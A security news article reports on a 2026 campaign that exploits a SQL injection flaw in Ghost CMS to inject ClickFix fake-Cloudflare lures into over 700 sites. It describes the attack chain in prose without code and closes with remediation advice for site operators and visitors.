Over 700 websites running the Ghost CMS publishing platform have been compromised in a large-scale attack campaign exploiting a critical SQL injection vulnerability, researchers at Qianxin XLab have confirmed. The vulnerability, tracked as CVE-2026-26980 with a CVSS score of 9.4, requires no authentication to exploit and allows attackers to read arbitrary data from the database — including administrative API keys that unlock full site control.

Among the confirmed compromised sites: Harvard University, Oxford University, Auburn University, and DuckDuckGo. The injected payload deploys a ClickFix social engineering lure, tricking visitors into running malicious Windows commands under the guise of a Cloudflare human verification check.

The Vulnerability

CVE-2026-26980 is an SQL injection flaw in Ghost’s Content API — the interface Ghost uses to expose published content to themes, integrations, and headless front ends. The flaw affects Ghost versions 3.24.0 through 6.19.0, a range spanning years of releases and covering a substantial portion of the Ghost install base.

The vulnerability is unauthenticated, meaning an attacker does not need any credentials or existing access to exploit it. By sending a crafted request to the Content API, an attacker can extract arbitrary rows from the Ghost database — including the Admin API key, which grants full administrative control over the CMS instance: creating and modifying posts, managing users, and injecting arbitrary JavaScript into published content.

The Attack Chain

Once an attacker extracts the Admin API key via the SQL injection, the attack chain has three more stages:

Stage 1 — JavaScript injection. The attacker uses the Admin API to insert malicious JavaScript into Ghost articles. The JavaScript is lightweight and serves as a loader — it does nothing visible on initial page load and is designed to evade automated scanners.

Stage 2 — Visitor fingerprinting. When a visitor loads a compromised page, the injected script silently fingerprints them: checking operating system, browser, geolocation, and behavioral signals. Only visitors who clear the fingerprint threshold — typically Windows desktop users in targeted geographies — proceed to the next stage.

Stage 3 — ClickFix lure delivery. Qualifying visitors see a full-page overlay that mimics Cloudflare’s CAPTCHA verification interface. The fake page instructs the visitor to “verify they are human” by pressing a keyboard shortcut that opens the Windows Run dialog, then pasting a provided command and pressing Enter. The command silently downloads and executes the malware payload.

Observed payloads from this campaign include DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe. Electron-wrapped malware is increasingly common because it can run cross-platform JavaScript payloads while appearing to be a legitimate desktop application install.

Scale and Discovery Timeline

Qianxin XLab researchers first detected the poisoning activity on May 7, 2026. At that point, 156 domains had been confirmed compromised. One week later — by May 14 — that number had grown past 500. By the time the campaign received broad public coverage in late May, the count exceeded 700 domains.

The victim profile is diverse: university portals, AI and SaaS company websites, media outlets, fintech firms, security-focused blogs, and personal sites. The presence of DuckDuckGo among the compromised sites is particularly notable given the company’s focus on privacy — it signals that the attackers were not specifically targeting organizations with weak security postures, but were systematically scanning for vulnerable Ghost installations regardless of their operator.

The campaign’s geographic spread, victim diversity, and automated exploitation approach suggest the attackers are running a scanning-and-exploit pipeline against internet-exposed Ghost instances rather than conducting targeted attacks against specific organizations.

Ghost’s Exposure

Ghost is a popular open-source CMS used by independent publishers, technology companies, newsletters, and educational institutions. Its focus on performance and developer experience has made it a common choice for organizations that want more control than WordPress provides without the complexity of a fully custom CMS.

The long version range affected by CVE-2026-26980 — from 3.24.0 to 6.19.0 — suggests the vulnerability existed in the codebase for an extended period before being discovered and patched. Ghost’s self-hosted install base is particularly exposed because update adoption is inconsistent: many organizations install Ghost and leave it running without regular maintenance.

Ghost has released a patch addressing CVE-2026-26980. Any organization running a self-hosted Ghost instance on versions prior to the fixed release should treat an immediate upgrade as critical priority.

The ClickFix Technique

ClickFix is a social engineering technique that has grown significantly in prevalence over the past 18 months. It exploits the fact that Windows users can execute arbitrary commands through the Run dialog (Win+R) or the Command Prompt, and that many users will follow simple on-screen instructions without understanding what they’re running.

The Cloudflare verification fake is particularly effective because Cloudflare challenges are a normal and expected part of web browsing for most users. The visual design of legitimate Cloudflare pages — the spinner, the security message, the verification prompt — is widely recognized. Attackers have refined their fakes to be nearly indistinguishable at a glance.

ClickFix campaigns have previously been linked to Lumma Stealer, AsyncRAT, and various banking trojans. The Ghost-based campaign’s use of UtilifySetup.exe and DLL loaders suggests a different payload chain, possibly affiliated with a distinct threat actor that has adopted ClickFix as a delivery mechanism.

Remediation

For Ghost site operators: Update to the latest Ghost version immediately. Review your Admin API key and rotate it. Audit recent posts and themes for injected JavaScript. Check your hosting logs for unusual API requests.

For visitors of affected sites: If you encountered a Cloudflare-style verification prompt on any website that asked you to paste a command into a Windows dialog, assume your system is compromised. Run a full malware scan, rotate any credentials stored in your browser, and consider a fresh OS image if the malware analysis of UtilifySetup.exe indicates a persistent implant.

Sources